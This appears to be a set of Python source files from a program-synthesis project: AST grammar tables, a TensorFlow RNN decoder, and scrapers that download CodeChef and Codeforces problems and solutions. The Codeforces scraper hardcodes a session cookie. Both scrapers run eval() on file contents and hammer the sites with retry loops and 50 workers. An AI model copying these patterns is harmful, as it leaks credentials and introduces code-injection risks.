"SetComp": ['expr elt', 'comprehension* generators'],
"DictComp": ['expr key', 'expr value', 'comprehension* generators'],
"GeneratorExp": ['expr elt', 'comprehension* generators'],
"Yield": ['expr? value'],
"Compare": ['expr left', 'cmpop* ops', 'expr* comparators'],
"Call": ['expr func', 'expr* args', 'keyword* keywords, expr? starargs', 'expr? kwargs'],
"Repr": ['expr value'],
"Num": ['object n'],
"Str": ['string s'],
"Attribute": ['expr value', 'identifier attr', 'expr_context ctx'],
"Subscript": ['expr value', 'slice slice', 'expr_context ctx'],
"Name": ['identifier id', 'expr_context ctx'],
"List": ['expr* elts', 'expr_context ctx'],
"Tuple": ['expr* elts', 'expr_context ctx'],
#"attributes": ['int lineno', 'int col_offset'],
}
expr_context_dict = {"Load": [], "Store": [], "Del": [], "AugLoad": [], "AugStore": [], "Param": []}
slice_dict = {"Ellipsis": [],
"Slice": ['expr? lower', 'expr? upper', 'expr? step'],
"ExtSlice": ['slice* dims'],
"Index": ['expr value'],
}
boolop_dict = {"And": [], "Or": []}
operator_dict = {"Add": [], "Sub": [], "Mult": [], "Div": [], "Mod": [],
"Pow": [], "LShift": [], "RShift": [], "BitOr": [],
"BitXor": [], "BitAnd": [], "FloorDiv": []}
unaryop_dict = {"Invert": [], "Not": [], "UAdd": [], "USub": []}
cmpop_dict = {"Eq": [], "NotEq": [], "Lt": [], "LtE": [], "Gt": [],
"GtE": [], "Is": [], "IsNot": [], "In": [], "NotIn": []}
comprehension_dict = {"comprehension": ['expr target', 'expr iter', 'expr* ifs']}
excepthandler_dict = {"ExceptHandler": ['expr? type', 'expr? name', 'stmt* body'],
"attributes ": ['int lineno', 'int col_offset']}
arguments_dict = {"arguments": ['expr* args', 'identifier? vararg', 'identifier? kwarg', 'expr* defaults']}
keyword_dict = {"keyword": ['identifier arg', 'expr value']}
alias_dict = {"alias": ['identifier name', 'identifier? asname']}
bool_dict = '''True/False'''
'''below are built_in_types that skip the class and jump straight to function'''
'''e.g. looks like ='turnt' or =12 instead of looking like =Load() or =Store()'''
'''if one of these, rnn needs to generate or copy a sequence of characters'''
#identifier
#int
#string
#object
#bool #selects True or False
#ones that take string with quotes are string, identifier
#string can be any character(s)
#identifier can only start with letter and _ and can only consist of those and num
#ones that take string without quotes are int, object
#int can only be numbers, 'L', '-'
#object can only be numbers, 'L' decimal_point, 'e', '+', '-'
program_classes_list = ['mod', 'stmt', 'expr', 'expr_context', 'slice', 'boolop', 'operator', 'unaryop', 'cmpop', 'comprehension', 'excepthandler', 'arguments', 'keyword', 'alias']
program_classes = {}
'''THIS LOOP SHOULD PROBABLY BE PUT IN A CLASS OR FUNCTION'''
for i in program_classes_list:
program_classes[i] = AbstractProgramSet()
exec("program_classes[i].create_and_register_all(%s)" % (i+"_dict"))
def to_one_hot(program_id, size, dtype=np.float):
ret = np.zeros((size,), dtype=dtype)
ret[program_id] = 1
return ret
def get_pc_index(key_name):
for i in range(len(program_classes.keys())):
if program_classes.keys()[i] == str(key_name):
return i
def get_p_index(pc_name, p_name):
for i in range(0, program_classes[pc_name].program_id):
if str(program_classes[pc_name].get(i)) == str(p_name):
return i
args_demo = ('expr* args', 'identifier? vararg', 'identifier? kwarg', 'expr* defaults')
arg_amount_dic = {1: '', 2: '*', 3: '?'}
'''I think this is used to let rnn know how many arguments it's selecting'''
def argument_parser(arguments):
parse_args =[]
for argument in arguments:
parse_args.append(re.split(' ', argument))
return parse_args
#print argument_parser(args_demo)
```
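The registration-plus-one-hot pattern implemented by `Program` and `AbstractProgramSet` above, reduced to a self-contained sketch (the symbol names below are just examples):
```python
import numpy as np
# each symbol gets an integer id at registration time, and ids become
# one-hot vectors for the model -- same idea as AbstractProgramSet above
registry = {}
for pid, name in enumerate(["Add", "Sub", "Mult", "Div"]):
    registry[name] = pid
def one_hot(pid, size, dtype=np.float32):
    vec = np.zeros((size,), dtype=dtype)
    vec[pid] = 1
    return vec
print(registry["Mult"])                           # 2
print(one_hot(registry["Mult"], len(registry)))   # [0. 0. 1. 0.]
```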
#### File: 0bserver07/neural-engineers-first-attempt/rnn_decoder_utils.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from functools import partial
import tensorflow as tf
from tensorflow.contrib.layers import fully_connected
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope as vs
__all__ = ["rnn_decoder",
"rnn_decoder_attention"]
"""Used to project encoder state in `rnn_decoder`"""
encoder_projection = partial(fully_connected, activation_fn=math_ops.tanh)
def rnn_decoder(cell, decoder_inputs, initial_state,
sequence_length, decoder_fn,
encoder_projection=encoder_projection,
parallel_iterations=None, swap_memory=False,
time_major=False, scope=None):
"""RNN decoder for a sequence-to-sequence model specified by RNNCell 'cell'.
The 'rnn_decoder' is similar to the 'tf.python.ops.rnn.dynamic_rnn'. As the
decoder does not make any assumptions of sequence length of the input or how
many steps it can decode, since 'rnn_decoder' uses dynamic unrolling. This
allows `decoder_inputs` to have [None] in the sequence length of the decoder
inputs.
  The parameter decoder_inputs is necessary for both training and evaluation.
  During training it is fed at every timestep. During evaluation it is only
  fed at time==0, as the decoder needs the `start-of-sequence` symbol, known
from Sutskever et al., 2014 https://arxiv.org/abs/1409.3215, at the
beginning of decoding.
  The parameter sequence length is necessary as it determines how many
timesteps to decode for each sample. TODO: Could make it optional for
training.
Args:
cell: An instance of RNNCell.
inputs: The RNN inputs.
If `time_major == False` (default), this must be a `Tensor` of shape:
`[batch_size, max_time, ...]`.
If `time_major == True`, this must be a `Tensor` of shape:
`[max_time, batch_size, ...]`.
The input to `cell` at each time step will be a `Tensor` with dimensions
`[batch_size, ...]`.
sequence_length: An int32/int64 vector sized `[batch_size]`.
initial_state: An initial state for the RNN.
Must be [batch_size, num_features], where num_features does not have to
match the cell.state_size. As a projection is performed at the beginning
of the decoding.
decoder_fn: A function that takes a state and returns an embedding.
The decoder function is closely related to `_extract_argmax_and_embed`.
Here is an example of a `decoder_fn`:
def decoder_fn(embeddings, weight, bias):
def dec_fn(state):
prev = tf.matmul(state, weight) + bias
return tf.gather(embeddings, tf.argmax(prev, 1))
return dec_fn
encoder_projection: (optional) given that the encoder might have a
different size than the decoder, we project the intial state as
described in Bahdanau, 2014 (https://arxiv.org/abs/1409.0473).
The optional `encoder_projection` is a
`tf.contrib.layers.fully_connected` with
`activation_fn=tf.python.ops.nn.tanh`.
parallel_iterations: (Default: 32). The number of iterations to run in
parallel. Those operations which do not have any temporal dependency
and can be run in parallel, will be. This parameter trades off
time for space. Values >> 1 use more memory but take less time,
while smaller values use less memory but computations take longer.
swap_memory: Transparently swap the tensors produced in forward inference
but needed for back prop from GPU to CPU. This allows training RNNs
which would typically not fit on a single GPU, with very minimal (or no)
performance penalty.
time_major: The shape format of the `inputs` and `outputs` Tensors.
If true, these `Tensors` must be shaped `[max_time, batch_size, depth]`.
If false, these `Tensors` must be shaped `[batch_size, max_time, depth]`.
Using `time_major = True` is a bit more efficient because it avoids
transposes at the beginning and end of the RNN calculation. However,
most TensorFlow data is batch-major, so by default this function
accepts input and emits output in batch-major form.
scope: VariableScope for the created subgraph; defaults to "RNN".
Returns:
A pair (outputs, state) where:
outputs: The RNN output `Tensor`.
If time_major == False (default), this will be a `Tensor` shaped:
`[batch_size, max_time, cell.output_size]`.
If time_major == True, this will be a `Tensor` shaped:
`[max_time, batch_size, cell.output_size]`.
state: The final state. If `cell.state_size` is an int, this
will be shaped `[batch_size, cell.state_size]`. If it is a
`TensorShape`, this will be shaped `[batch_size] + cell.state_size`.
Raises:
TypeError: If `cell` is not an instance of RNNCell.
"""
with vs.variable_scope(scope or "decoder") as varscope:
# Project initial_state as described in Bahdanau et al. 2014
# https://arxiv.org/abs/1409.0473
state = encoder_projection(initial_state, cell.output_size)
# Setup of RNN (dimensions, sizes, length, initial state, dtype)
# Setup dtype
dtype = state.dtype
if not time_major:
# [batch, seq, features] -> [seq, batch, features]
decoder_inputs = array_ops.transpose(decoder_inputs, perm=[1, 0, 2])
# Get data input information
batch_size = array_ops.shape(decoder_inputs)[1]
decoder_input_depth = int(decoder_inputs.get_shape()[2])
# Setup decoder inputs as TensorArray
decoder_inputs_ta = tensor_array_ops.TensorArray(dtype, size=0,
dynamic_size=True)
decoder_inputs_ta = decoder_inputs_ta.unpack(decoder_inputs)
# Define RNN: loop function for training.
# This will run in the while_loop of 'raw_rnn'
def loop_fn_train(time, cell_output, cell_state, loop_state):
emit_output = cell_output
if cell_output is None:
next_cell_state = state # use projection of prev encoder state
else:
next_cell_state = cell_state
elements_finished = (time >= sequence_length) # TODO handle seq_len=None
finished = math_ops.reduce_all(elements_finished)
# Next input must return zero state for last element explanation below
# https://github.com/tensorflow/tensorflow/issues/4519
next_input = control_flow_ops.cond(
finished,
lambda: array_ops.zeros([batch_size, decoder_input_depth],
dtype=dtype),
lambda: decoder_inputs_ta.read(time))
next_loop_state = None
return (elements_finished, next_input, next_cell_state,
emit_output, next_loop_state)
# Define RNN: loop function for evaluation.
# This will run in the while_loop of 'raw_rnn'
def loop_fn_eval(time, cell_output, cell_state, loop_state):
emit_output = cell_output
if cell_output is None:
next_cell_state = state # use projection of prev encoder state
else:
next_cell_state = cell_state
elements_finished = (time >= sequence_length) # TODO handle seq_len=None
finished = math_ops.reduce_all(elements_finished)
# Next input must return zero state for last element explanation below
# https://github.com/tensorflow/tensorflow/issues/4519
next_input = control_flow_ops.cond(
finished,
lambda: array_ops.zeros([batch_size, decoder_input_depth],
dtype=dtype),
lambda: control_flow_ops.cond(math_ops.greater(time, 0),
lambda: decoder_fn(next_cell_state), # Gather max prediction.
lambda: decoder_inputs_ta.read(0))) # Read <EOS> tag
next_loop_state = None
return (elements_finished, next_input, next_cell_state,
emit_output, next_loop_state)
# Run raw_rnn function
outputs_ta_train, _, _ = \
rnn.raw_rnn(cell, loop_fn_train,
parallel_iterations=parallel_iterations,
swap_memory=swap_memory, scope=varscope)
# Reuse the cell for evaluation
varscope.reuse_variables()
outputs_ta_eval, _, _ = \
rnn.raw_rnn(cell, loop_fn_eval,
parallel_iterations=parallel_iterations,
swap_memory=swap_memory, scope=varscope)
outputs_train = outputs_ta_train.pack()
outputs_eval = outputs_ta_eval.pack()
if not time_major:
# [seq, batch, features] -> [batch, seq, features]
outputs_train = array_ops.transpose(outputs_train, perm=[1, 0, 2])
outputs_eval = array_ops.transpose(outputs_eval, perm=[1, 0, 2])
return outputs_train, outputs_eval
def rnn_decoder_attention(*args, **kwargs):
pass
def rnn_decoder_simple(cell, decoder_inputs, initial_state, loop_function=None,
scope=None):
"""RNN decoder for the sequence-to-sequence model.
Args:
decoder_inputs: A list of 2D Tensors [batch_size x input_size].
initial_state: 2D Tensor with shape [batch_size x cell.state_size].
cell: rnn_cell.RNNCell defining the cell function and size.
loop_function: If not None, this function will be applied to the i-th output
in order to generate the i+1-st input, and decoder_inputs will be ignored,
except for the first element ("GO" symbol). This can be used for decoding,
but also for training to emulate http://arxiv.org/abs/1506.03099.
Signature -- loop_function(prev, i) = next
* prev is a 2D Tensor of shape [batch_size x output_size],
* i is an integer, the step number (when advanced control is needed),
* next is a 2D Tensor of shape [batch_size x input_size].
scope: VariableScope for the created subgraph; defaults to "rnn_decoder".
Returns:
A tuple of the form (outputs, state), where:
outputs: A list of the same length as decoder_inputs of 2D Tensors with
shape [batch_size x output_size] containing generated outputs.
state: The state of each cell at the final time-step.
It is a 2D Tensor of shape [batch_size x cell.state_size].
(Note that in some cases, like basic RNN cell or GRU cell, outputs and
states can be the same. They are different for LSTM cells though.)
"""
with vs.variable_scope(scope or "rnn_decoder"):
state = initial_state
outputs = []
prev = None
for i, inp in enumerate(decoder_inputs):
if loop_function is not None and prev is not None:
with vs.variable_scope("loop_function", reuse=True):
inp = loop_function(prev, i)
if i > 0:
vs.get_variable_scope().reuse_variables()
output, state = cell(inp, state)
outputs.append(output)
if loop_function is not None:
prev = output
return outputs, state
class CustomCell(tf.nn.rnn_cell.RNNCell):
"""Gated Recurrent Unit cell (cf. http://arxiv.org/abs/1406.1078)."""
def __init__(self, num_units, num_weights):
self._num_units = num_units
self._num_weights = num_weights
@property
def state_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
def __call__(self, inputs, state, scope=None):
with tf.variable_scope(scope or type(self).__name__): # "GRUCell"
with tf.variable_scope("Gates"): # Reset gate and update gate.
# We start with bias of 1.0 to not reset and not update.
ru = tf.nn.rnn_cell._linear([inputs, state],
2 * self._num_units, True, 1.0)
ru = tf.nn.sigmoid(ru)
r, u = tf.split(1, 2, ru)
with tf.variable_scope("Candidate"):
lambdas = tf.nn.rnn_cell._linear([inputs, state], self._num_weights, True)
lambdas = tf.split(1, self._num_weights, tf.nn.softmax(lambdas))
Ws = tf.get_variable("Ws",
shape=[self._num_weights, inputs.get_shape()[1], self._num_units])
Ws = [tf.squeeze(i) for i in tf.split(0, self._num_weights, Ws)]
candidate_inputs = []
for idx, W in enumerate(Ws):
candidate_inputs.append(tf.matmul(inputs, W) * lambdas[idx])
Wx = tf.add_n(candidate_inputs)
c = tf.nn.tanh(Wx + tf.nn.rnn_cell._linear([r * state],
self._num_units, True, scope="second"))
new_h = u * state + (1 - u) * c
return new_h, new_h
```
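The `decoder_fn` contract described in the `rnn_decoder` docstring (map the previous decoder state to the next input embedding via an argmax) can be shown without TensorFlow; a numpy sketch with invented shapes:
```python
import numpy as np
rng = np.random.default_rng(0)
vocab, state_size, embed_size = 5, 8, 4
embeddings = rng.normal(size=(vocab, embed_size))   # one row per vocabulary token
W = rng.normal(size=(state_size, vocab))
b = np.zeros(vocab)
def decoder_fn(state):
    # project the state to vocabulary logits, take the argmax token,
    # and feed that token's embedding back in as the next decoder input
    logits = state @ W + b
    return embeddings[np.argmax(logits, axis=1)]
state = rng.normal(size=(2, state_size))            # batch of 2
print(decoder_fn(state).shape)                      # (2, 4)
```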
#### File: scrapers/codechef/codechef_scraper_clean_pts_for_hardest.py
```python
import shutil
import os
import re
import requests
import urllib2
from pprint import pprint
from bs4 import BeautifulSoup
import html2text
import time
import argparse
import concurrent.futures
def escape_lt(html):
html_list = list(html)
for index in xrange(0, len(html) - 1):
if html_list[index] == '<' and html_list[index + 1] == ' ':
            html_list[index] = '&lt;'
return ''.join(html_list)
'''TODO: not sure if this one makes sense'''
def escape_gt(html):
html_list = list(html)
for index in xrange(0, len(html) - 1):
if html_list[index] == ' ' and html_list[index + 1] == '>':
            html_list[index + 1] = '&gt;'
return ''.join(html_list)
def get_problem_list(url):
page = requests.get(url)
if str(page) == "<Response [503]>":
while str(page) == "<Response [503]>":
time.sleep(1)
page = requests.get(url)
html_content = page.text
soup = BeautifulSoup(html_content, "html.parser")
messages = []
text = soup.select("body a")
for row in text:
message = ""
raw = str(row)
body = re.search('/submit/(.*)" t', raw)
if body != None:
w = body.group(1)
message = str(w)
if message != 'easy' and message != 'medium' and message != 'hard' and message != 'challenge' and message != 'extcontest' and message != 'school':
messages.append(message)
return messages
def get_solution_ids(name, language):
if language == 'python':
url = 'https://www.codechef.com/status/%s?sort_by=All&sorting_order=asc&language=4&status=15&handle=&Submit=GO' % (name)
url2 = 'https://www.codechef.com/status/%s?page=1&sort_by=All&sorting_order=asc&language=4&status=15&handle=&Submit=GO' % (name)
elif language == 'c++':
url = 'https://www.codechef.com/status/%s?sort_by=All&sorting_order=asc&language=41&status=15&handle=&Submit=GO' % (name)
url2 = 'https://www.codechef.com/status/%s?page=1&sort_by=All&sorting_order=asc&language=41&status=15&handle=&Submit=GO' % (name)
else:
pass
page1 = requests.get(url)
if str(page1) == "<Response [503]>":
while str(page1) == "<Response [503]>":
time.sleep(1)
page1 = requests.get(url)
page2 = requests.get(url2)
if str(page2) == "<Response [503]>":
while str(page2) == "<Response [503]>":
time.sleep(1)
page2 = requests.get(url2)
if re.search("<div align='center' class='pageinfo'>", page1.text) == None:
html_content = page1.text
else:
html_content = page1.text + page2.text
messages = []
solution_id = re.findall("href='/viewsolution/(.+?)' target='_blank'>View", html_content)
pts = re.findall("/>\\[(.+?)pts\\]<", html_content)
if len(pts) != 0 and len(solution_id) != 0:
for i in range(len(pts)):
if str(pts[i]) == '100' or (float(pts[i]) > .997 and float(pts[i]) < 1.001):
messages.append(str(solution_id[i]))
elif len(pts) == 0 and len(solution_id) != 0:
for i in range(len(solution_id)):
messages.append(str(solution_id[i]))
else:
pass
return messages
def get_description(i):
descriptions = []
left_out = []
failed_to_download_d = []
url = "https://www.codechef.com/api/contests/PRACTICE/problems/" + str(i)
page = requests.get(url)
if str(page) == "<Response [503]>":
while str(page) == "<Response [503]>":
time.sleep(1)
page = requests.get(url)
html_content = page.text
if re.search('"message":"requests limit exhausted"', html_content) != None:
while re.search('message":"requests limit exhausted', html_content) != None:
time.sleep(1)
page = requests.get(url)
html_content = page.text
if html_content==None:
failed_to_download_d.append(i)
if re.search('src="https://s3.amazonaws.com/codechef_shared/download/upload', html_content.replace("\\", "")) == None and re.search('src="/download/extimages', html_content.replace("\\", "")) == None and re.search('"message":"Problem is not visible now. Please try again later."', html_content) == None:
first_clean = page.json()['body'].replace("<sup>", "<sup>^").replace(" <=", u" ≤").replace(" >=", u" ≥").replace("<=", u" ≤ ").replace(">=", u" ≥ ").replace(u"≤ ", u"≤ ").replace(u"≥ ", u"≥ ").replace("<h3>", "<h3>\n")
keep_lt = escape_lt(first_clean)
second_clean = escape_gt(keep_lt)
body = BeautifulSoup(second_clean).get_text()
w = body
w = w.replace("\nAll submissions for this problem are available.", "")
w = w.replace("All submissions for this problem are available.", "")
        w = re.sub('\n Read problems statements in (.+?)\n', '', w, flags=re.M)
        w = re.sub('\nRead problems statements in (.+?)\n', '', w, flags=re.M)
        w = re.sub(' Read problems statements in (.+?)\n', '', w, flags=re.M)
        w = re.sub('Read problems statements in (.+?)\n', '', w, flags=re.M)
w = re.sub('Subtask(.+?)Example', 'Example', w, flags=re.M|re.S)
w = w.replace("\u003C","<")
w = w.replace("\u003E",">")
w = w.replace("\\","\\\\")
descriptions.append(w.encode('utf-8').decode('string-escape'))
else:
left_out.append(i)
return descriptions, left_out, failed_to_download_d
def get_solutions(solution_ids):
solutions = {}
failed_to_download_s = []
with concurrent.futures.ProcessPoolExecutor(max_workers=50) as executor:
future_to_url = {executor.submit(get_solution, i): i for i in solution_ids}
for future in concurrent.futures.as_completed(future_to_url):
data = future.result()
if data[2] == None:
solutions[data[0]] = data[1]
return solutions
def get_solution(solution_id):
url = "https://www.codechef.com/viewplaintext/" + str(solution_id)
page = requests.get(url)
if str(page) == "<Response [503]>":
while str(page) == "<Response [503]>":
time.sleep(1)
page = requests.get(url)
html_content = page.text
    if html_content is None:
        return solution_id, None, solution_id
text = BeautifulSoup(html_content, "html.parser").get_text()
failed_to_download = None
solution = None
    if len(text)==0 or re.search(re.escape('var _sf_startpt = (new Date()).getTime()'), text) != None:
failed_to_download = solution_id
else:
text = text.replace("\\","\\\\")
solution = text.encode('utf-8').decode('string-escape')
return solution_id, solution, failed_to_download
def download_all_challenge_names(filename):
target = open(filename, 'w')
problems = get_problem_list("https://www.codechef.com/problems/school/?sort_by=SuccessfulSubmission&sorting_order=desc")
target.write(str("\neasy\n"))
target.write(str(problems))
problems = get_problem_list("https://www.codechef.com/problems/easy/?sort_by=SuccessfulSubmission&sorting_order=desc")
target.write(str("\nmedium\n"))
target.write(str(problems))
problems = get_problem_list("https://www.codechef.com/problems/medium/?sort_by=SuccessfulSubmission&sorting_order=desc")
target.write(str("\nhard\n"))
target.write(str(problems))
problems = get_problem_list("https://www.codechef.com/problems/hard/?sort_by=SuccessfulSubmission&sorting_order=desc")
target.write(str("\nharder\n"))
target.write(str(problems))
problems = get_problem_list("https://www.codechef.com/problems/challenge/?sort_by=SuccessfulSubmission&sorting_order=desc")
target.write(str("\nhardest\n"))
target.write(str(problems))
problems = get_problem_list("https://www.codechef.com/problems/extcontest/?sort_by=SuccessfulSubmission&sorting_order=desc")
target.write(str("\nexternal\n"))
target.write(str(problems))
def download_descriptions_solutions(filename, index_n):
root_dir = 'codechef_data_currently'
file = open(filename, 'r')
f = open(filename, 'r')
index_n_int = int(index_n)
start = index_n_int + (500*index_n_int)
end = start + 499
easy = []
medium = []
hard = []
harder = []
hardest = []
external = []
g = ""
i=0
for line in f:
if str(line).find('type=') != -1:
body = re.search('type=(.*)', line)
g = body.group(1)
else:
if str(g) == "easy":
easy = eval(line)
elif str(g) == "medium":
medium = eval(line)
elif str(g) == "hard":
hard = eval(line)
elif str(g) == "harder":
harder = eval(line)
elif str(g) == "hardest":
hardest = eval(line)
elif str(g) == "external":
external = eval(line)
else:
pass
all_names = []
all_names_p = []
all_names =[["easy", easy], ["medium", medium], ["hard", hard], ["harder", harder], ["hardest", hardest], ["external", external]]
    already_scraped = []
    failed_to_download = []
for ndx, n in enumerate(all_names):
category = all_names[ndx][0]
problem_list = all_names[ndx][1]
language = ["python", "c++"]
for idx, i in enumerate(problem_list):
            descriptions, left_out, failed_to_download_d = get_description(i)
            failed_to_download += failed_to_download_d
if i not in left_out:
if not os.path.exists(root_dir):
os.makedirs(root_dir)
cat_dir = root_dir + "/" + category
if not os.path.exists(cat_dir):
os.makedirs(cat_dir)
save_dir = cat_dir + "/" + i
if not os.path.exists(save_dir):
os.makedirs(save_dir)
description_dir = save_dir + "/description"
if not os.path.exists(description_dir):
os.makedirs(description_dir)
description_file_path = description_dir + "/description.txt"
description_file = open(description_file_path, 'w')
description_file.write(str(descriptions[0]))
#'''
ids_l = []
for l in language:
ids = get_solution_ids(i, l)
ids_l.append(ids)
solutions = get_solutions(ids)
solution_dir = save_dir + "/solutions_" + l
if not os.path.exists(solution_dir):
os.makedirs(solution_dir)
for jdx, j in enumerate(solutions):
if len(solutions[j]) < 10000:
solution_file_path = solution_dir + "/" + j + ".txt"
solution_file = open(solution_file_path, 'w')
solution_file.write(solutions[j])
#remove problems with zero solutions
if len(ids_l[0]) == 0 and len(ids_l[1]) == 0:
shutil.rmtree(save_dir)
print("Finished download process")
if len(failed_to_download) > 0:
        print("Following challenges failed to download: " + str(failed_to_download))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--index', type=str, default="index", help='')
args = parser.parse_args()
index_n = args.index
download_descriptions_solutions('codechef_problem_names.txt', index_n)
```
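The scraper retries on HTTP 503 by comparing `str(page)` against the response's repr; the same retry loop expressed against `status_code` would look roughly like this (sketch, not part of the repo):
```python
import time
import requests
def get_with_retry(url, wait=1.0, max_tries=30):
    """Retry a GET while the server answers 503 (rate limiting)."""
    response = requests.get(url)
    for _ in range(max_tries):
        if response.status_code != 503:
            break
        time.sleep(wait)
        response = requests.get(url)
    return response
```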
#### File: scrapers/codeforces/codeforces_get_list_and_tags.py
```python
from pprint import pprint
from bs4 import BeautifulSoup
import requests
import urllib2
import re
'''
info = 'http://codeforces.com/api/user.status?handle=tacklemore&from=1&count=1'
solution = 'view-source:http://codeforces.com/contest/686/submission/18671530'
do not include problems with http://codeforces.com/predownloaded/
'''
def get_problem_list(url):
page = requests.get(url)
if str(page) == "<Response [503]>":
while str(page) == "<Response [503]>":
time.sleep(1)
page = requests.get(url)
html_content = page.text
soup = BeautifulSoup(html_content, "html.parser") # making soap
messages = []
tags = []
problem_and_tags = {}
problem_and_tags_array = []
text = soup.select("body a")
body_problem_prev = None
b_p = None
for row in text:
message = ""
raw = str(row)
body_problem = re.search(' href="/problemset/submit/(.*)">', raw)
body_tag = re.search(' href="/problemset/tags/(.*)" style', raw)
#second_tag = re.search('style="float:right', raw)
if body_problem != None:
w = body_problem.group(1)
message = str(w)
b_p = message.replace('/', '_')
problem_and_tags[b_p] = tags
problem_and_tags_array.append(problem_and_tags)
problem_and_tags = {}
tags = []
if body_tag != None:
w = body_tag.group(1)
message = str(w)
b_t = message
tags.append(b_t)
return problem_and_tags_array
problem_list = []
for i in range(0,30):
a = 'http://codeforces.com/problemset/page/' + str(i+1)
l = get_problem_list(a)
problem_list += l
print(problem_list)
'''
for k in sorted(problem_list):
print k.replace(' ', '_'), problem_list[k]
#'''
description_file = open("tags.txt", 'w')
description_file.write('')
for k in problem_list:
description_file = open("tags.txt", 'a')
description_file.write(str(k) + "\n")
```
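Each line written to `tags.txt` is the `repr` of a one-entry dict mapping a problem id to its tag list; reading it back with `ast.literal_eval` (rather than `eval`) would look roughly like this sketch:
```python
import ast
with open("tags.txt") as fh:
    problems = [ast.literal_eval(line) for line in fh if line.strip()]
# each entry maps a 'contest_problem' string to its list of tag strings
print(problems[0])
```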
#### File: scrapers/codeforces/codeforces_scraper.py
```python
import shutil
import os
import re
import requests
import urllib2
from pprint import pprint
from bs4 import BeautifulSoup
import html2text
import time
import argparse
import concurrent.futures
def sub_strip(matchobj):
return matchobj.group(0).replace(u"\u2009", "")
def get_problem_list(url):
page = requests.get(url)
if str(page) == "<Response [503]>":
while str(page) == "<Response [503]>":
time.sleep(1)
page = requests.get(url)
html_content = page.text
soup = BeautifulSoup(html_content, "html.parser") # making soap
messages = []
text = soup.select("body a")
for row in text:
message = ""
raw = str(row)
body = re.search(' href="/problemset/problem/(.*)">', raw)
if body != None:
w = body.group(1)
message = str(w)
c = message.split('/')
#if message != 'easy' and message != 'medium' and message != 'hard' and message != 'challenge' and message != 'extcontest' and message != 'school':
#messages.append(message)
messages.append(c)
return messages
def get_solution_ids(name, language):
'''IF IT'S BEEN A LONG TIME SINCE THE LAST TIME YOU USED THIS CODE, YOU NEED TO LOG IN AGAIN AND SEE WHAT CURRENT JSESSIONID AND 39ce7 ARE'''
d = {'JSESSIONID': 'FBAAF89D197D7A5C7E95C536A7D31A7A-n1', '39ce7': 'CFtRZMGC'}
#d = {'JSESSIONID': '<KEY>', '39ce7': 'CFh6GVF2'}
#JSESSIONID=77C3B36AE19BC9CE0B75529825DDB926-n1; 39ce7=CFh6GVF2
url = 'http://codeforces.com/problemset/status/' + name[0] + '/problem/' + name[1]
c = requests.get(url, cookies = d)
m = re.search('meta name="X-Csrf-Token" content="(.*)"', c.text)
if not m:
        raise Exception('unable to get csrf token')
csrf_token = m.groups(1)
if language == 'python':
#c = requests.post("http://codeforces.com/problemset/status/1/problem/A",
c = requests.post(url,
data = {'csrf_token':csrf_token, 'action':'setupSubmissionFilter', 'frameProblemIndex':'A', 'verdictName':'OK', 'programTypeForInvoker':'python.2', 'comparisonType':'NOT_USED', 'judgedTestCount':'', '_tta':'199'},
headers = {'X-Csrf-Token':csrf_token},
cookies = d
)
elif language == 'c++':
#c = requests.post("http://codeforces.com/problemset/status/1/problem/A",
c = requests.post(url,
data = {'csrf_token':csrf_token, 'action':'setupSubmissionFilter', 'frameProblemIndex':'A', 'verdictName':'OK', 'programTypeForInvoker':'cpp.g++', 'comparisonType':'NOT_USED', 'judgedTestCount':'', '_tta':'199'},
headers = {'X-Csrf-Token':csrf_token},
cookies = d
)
else:
pass
page = requests.get(url, cookies = d)
if str(page) == "<Response [503]>":
while str(page) == "<Response [503]>":
time.sleep(1)
page = requests.get(url)
html_content = page.text
soup = BeautifulSoup(html_content, "html.parser") # making soap
messages = []
text = soup.select("body a")
for row in text:
message = ""
raw = str(row)
body = re.search('submissionid="(.*)" t', raw)
if body != None:
w = body.group(1)
message = str(w)
messages.append(message)
return messages
def get_description(i):
descriptions = []
left_out = []
failed_to_download_d = []
url = 'http://codeforces.com/problemset/problem/' + str(i[0]) + '/' + str(i[1])
page = requests.get(url)
if str(page) == "<Response [503]>":
while str(page) == "<Response [503]>":
time.sleep(1)
page = requests.get(url)
html_content = page.text
if re.search('"message":"requests limit exhausted"', html_content) != None:
while re.search('message":"requests limit exhausted', html_content) != None:
time.sleep(1)
page = requests.get(url)
html_content = page.text
if html_content==None:
failed_to_download_d.append(i)
if re.search('src="http://codeforces.com/predownloaded', html_content.replace("\\", "")) == None and re.search('src="http://espresso.codeforces.com', html_content.replace("\\", "")) == None and re.search('"message":"Problem is not visible now. Please try again later."', html_content) == None and re.search('Statement is not available', html_content) == None:
body = re.findall('</div></div><div>(.+?)<script type="text/javascript">', html_content, flags=re.S)
w = body[0]
w = w.replace('class="upper-index">', 'class="upper-index">^')
'''NEED TO PUT PUT CODE HERE TO REMOVE SPACES IN NEGATIVE EXPONENTS'''
        w = re.sub('class="upper-index">(.+?)</sup>', sub_strip, w, flags=re.S)
w = w.replace("</p>", "\n</p>")
w = w.replace("<br", "\n<br")
w = w.replace("</div>", "\n</div>")
w = w.replace("</center>", "\n</center>")
w = BeautifulSoup(w, "html.parser").get_text()
w = w.replace("All submissions for this problem are available.", "")
        w = re.sub('Read problems statements in (.+?)\\\\n', '', w, flags=re.M)
        w = re.sub('Subtasks(.+?)Example', 'Example', w, flags=re.S)
w = w.replace("\u003C","<")
w = w.replace("\u003E",">")
w = w.replace("\n\n\n\n\n\n","\n\n\n")
w = w.replace("\n\n\n\n","\n\n\n")
w = w.replace("\\","\\\\")
descriptions.append(w.encode('utf-8').decode('string-escape'))
else:
left_out.append(i)
return descriptions, left_out, failed_to_download_d
def get_solutions(contest, solution_ids):
solutions = {}
#failed_to_download_s = []
with concurrent.futures.ProcessPoolExecutor(max_workers=50) as executor:
future_to_url = {executor.submit(get_solution, contest, i): i for i in solution_ids}
for future in concurrent.futures.as_completed(future_to_url):
data = future.result()
if data[2] == None:
solutions[data[0]] = data[1]
return solutions
def get_solution(contest, solution_id):
url = 'http://codeforces.com/contest/' + str(contest[0]) + '/submission/' + str(solution_id)
page = requests.get(url)
if str(page) == "<Response [503]>":
while str(page) == "<Response [503]>":
time.sleep(1)
page = requests.get(url)
html_content = page.text
soup = BeautifulSoup(html_content, "html.parser")
text = soup.select("body > div > div > div > div > pre")
failed_to_download = None
